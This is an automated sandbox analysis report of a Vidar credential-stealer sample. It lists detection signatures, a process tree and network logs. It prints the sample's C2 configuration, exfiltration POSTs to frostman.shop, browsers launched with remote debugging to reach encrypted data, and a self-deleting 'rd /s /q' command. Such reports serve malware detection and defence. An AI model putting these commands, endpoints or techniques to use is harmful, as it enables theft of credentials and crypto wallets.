Windows Analysis Report
pjthjsdjgjrtavv.exe

Overview

General Information

Sample name: pjthjsdjgjrtavv.exe
Analysis ID: 1578710
MD5: 1d0fb45faa5b7a8b398703596d67c967
SHA1: b326e3801b56b5ed86ae66249e6ea64cdefa1997
SHA256: 4e0453e61609c04bce1071d29f21abc82800e11261e284ca3250fd8655239456
Tags: exe, Vidar, user-lontze7

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

  • System is w10x64
  • pjthjsdjgjrtavv.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\pjthjsdjgjrtavv.exe" MD5: 1D0FB45FAA5B7A8B398703596D67C967)
    • chrome.exe (PID: 7432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2028,i,10443688959258362392,15587232465003949149,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 3380 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 6772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,213816145862176203,3127195056463773546,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 7820 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 4260 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 7492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1552 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5880 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6832 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8416 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5396 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
pjthjsdjgjrtavv.exe | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

0.2.pjthjsdjgjrtavv.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.0.pjthjsdjgjrtavv.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

                  System Summary

                  Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\pjthjsdjgjrtavv.exe", ParentImage: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe, ParentProcessId: 6960, ParentProcessName: pjthjsdjgjrtavv.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7432, ProcessName: chrome.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-20T07:31:16.665004+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.7 | 49709 | TCP
                  2024-12-20T07:31:18.966565+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.7 | 49715 | TCP
                  2024-12-20T07:31:14.357306+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.7 | 49703 | 116.203.12.114 | 443 | TCP
                  2024-12-20T07:31:12.064761+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49701 | 116.203.12.114 | 443 | TCP

                  AV Detection

                  Source: pjthjsdjgjrtavv.exe, Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                  Source: pjthjsdjgjrtavv.exe, Virustotal: Detection: 48%
                  Source: pjthjsdjgjrtavv.exe, ReversingLabs: Detection: 57%
                  Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: pjthjsdjgjrtavv.exe, Joe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004078F0 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,0_2_004078F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004116B0 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,0_2_004116B0
                  Source: pjthjsdjgjrtavv.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

                  Networking

                  Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.7:49703 -> 116.203.12.114:443
                  Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.7:49701 -> 116.203.12.114:443
                  Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.7:49709
                  Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.7:49715
                  Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199809363512
                  Source: global traffic, HTTP traffic detected: GET /k04ael HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
                  Source: Joe Sandbox View, IP Address: 23.44.201.19
                  Source: Joe Sandbox View, IP Address: 116.203.12.114
                  Source: Joe Sandbox View, IP Address: 149.154.167.99
                  Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
                  Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknown, TCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00404280 InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00404280
                  Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 | Host: frostman.shop | Connection: Keep-Alive | Cache-Control: no-cache
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.dr, String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: global traffic, DNS traffic detected: DNS query: t.me
                  Source: global traffic, DNS traffic detected: DNS query: frostman.shop
                  Source: global traffic, DNS traffic detected: DNS query: www.google.com
                  Source: global traffic, DNS traffic detected: DNS query: ntp.msn.com
                  Source: global traffic, DNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global traffic, DNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global traffic, DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: global traffic, DNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global traffic, DNS traffic detected: DNS query: assets.msn.com
                  Source: global traffic, DNS traffic detected: DNS query: c.msn.com
                  Source: global traffic, DNS traffic detected: DNS query: api.msn.com
                  Source: unknown, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----4OHD2VS26F3EUA1V3790 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 | Host: frostman.shop | Content-Length: 256 | Connection: Keep-Alive | Cache-Control: no-cache
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://frostman.shop
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/(
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/)
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/8
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/D
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/K
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/S
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/W
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/g
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/h
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/o
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/tman.shop/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/tman.shop/8
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frostman.shop/~
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://frostman.shop;
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://frostman.shopZMYM
                  Source: pjthjsdjgjrtavv.exe String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                  Source: pjthjsdjgjrtavv.exe String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/8
                  Source: pjthjsdjgjrtavv.exe String found in binary or memory: https://t.me/k04ael
                  Source: pjthjsdjgjrtavv.exe String found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                  Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060

                  System Summary

                  Source: pjthjsdjgjrtavv.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_004054A0 0_2_004054A0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0041C450 0_2_0041C450
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0041B0B0 0_2_0041B0B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0041A340 0_2_0041A340
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0041DD60 0_2_0041DD60
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0041CF70 0_2_0041CF70
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_0041D3F0 0_2_0041D3F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: String function: 00410340 appears 127 times
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: String function: 00404DF0 appears 77 times
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: String function: 004119B0 appears 43 times
                  Source: pjthjsdjgjrtavv.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@68/283@24/17
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe Code function: 0_2_00412050 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,OpenProcess,TerminateProcess,CloseHandle,0_2_00412050
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\G04T7X2E.htm
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8308:120:WilError_03
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user~1\AppData\Local\Temp\c25d3b31-8907-418f-b1d0-82aef76c765e.tmp
